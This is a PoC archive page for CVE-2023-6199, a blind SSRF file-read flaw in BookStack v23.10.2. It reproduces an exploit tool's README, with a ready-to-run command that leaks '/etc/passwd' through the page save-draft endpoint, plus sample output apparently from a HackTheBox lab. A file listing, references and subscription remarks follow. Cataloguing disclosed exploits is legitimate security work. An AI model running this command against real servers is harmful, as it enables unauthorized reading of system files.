Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-6199 PoC — Book Stack v23.10.2 - LFR via Blind SSRF

Source
https://github.com/AbdrrahimDahmani/php_filter_chains_oracle_exploit_for_CVE-2023-6199
Associated Vulnerability
Title:Book Stack v23.10.2 - LFR via Blind SSRF (CVE-2023-6199)
Description:Book Stack version 23.10.2 allows filtering local files on the server. This is possible because the application is vulnerable to SSRF.
Description
A CLI to exploit parameters vulnerable to PHP filter chain error based oracle, modified to exploit CVE-2023-6199
Readme
# PHP filter chains: file read from error-based oracle. Updated Script to exploit CVE-2023-6199

A CLI to exploit parameters affected by the file read caused by the the error-based oracle of PHP filter chains. It can be used to leak the content of a local file when passed to vulnerable functions, such as `file()`, `hash_file()`, `file_get_contents()` or `copy()`, even when the server does not return the file content!
In this case we use it to read file by exploiting an SSRF vulnerability in Book Stack version 23.10.2 identified by CVE-2023-6199, which allows filtering local files on the server

## Example of Usage

```bash
$ python3 filters_chain_oracle_exploit.py --parameter html --headers '{"Content-Type": "application/x-www-form-urlencoded","X-CSRF-TOKEN":"your_CSRF_token","Cookie":"bookstack_session=your_session_token"}' --verb PUT --target http://localhost:80/ajax/page/your_page_number/save-draft --file '/etc/passwd'
```

```bash
[*] The following URL is targeted : http://checker.htb/ajax/page/9/save-draft
[*] The following local file is leaked : /etc/passwd
[*] Running PUT requests
[*] Additionnal headers used : {"Content-Type": "application/x-www-form-urlencoded","X-CSRF-TOKEN":"your_CSRF_token","Cookie":"bookstack_session=your_session_token"}
[+] File /etc/passwd leak is finished!
```

## References

- [CVE-2023-6199 - MITRE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6199)  
- [LFR via Blind SSRF in BookStack - Fluid Attacks](https://fluidattacks.com/blog/lfr-via-blind-ssrf-book-stack/?utm_source=mailing&utm_medium=activecampaign&utm_campaign=blognov22)  
- [PHP Filter Chains Oracle Exploit - Synacktiv](https://github.com/synacktiv/php_filter_chains_oracle_exploit)
File Snapshot

 [4.0K]  /data/pocs/59ea3a10664bd81ce96c2cb3189aa889878eee6b
├── [4.0K]  filters_chain_oracle
│   ├── [4.0K]  core
│   │   ├── [ 16K]  bruteforcer.py
│   │   ├── [6.3K]  requestor.py
│   │   ├── [ 303]  utils.py
│   │   └── [ 157]  verb.py
│   └── [4.0K]  tests
│       ├── [   0]  __init__.py
│       └── [4.7K]  test.py
├── [7.5K]  filters_chain_oracle_exploit.py
├── [ 368]  LICENSE
├── [1.7K]  README.md
└── [   9]  requirements.txt

3 directories, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →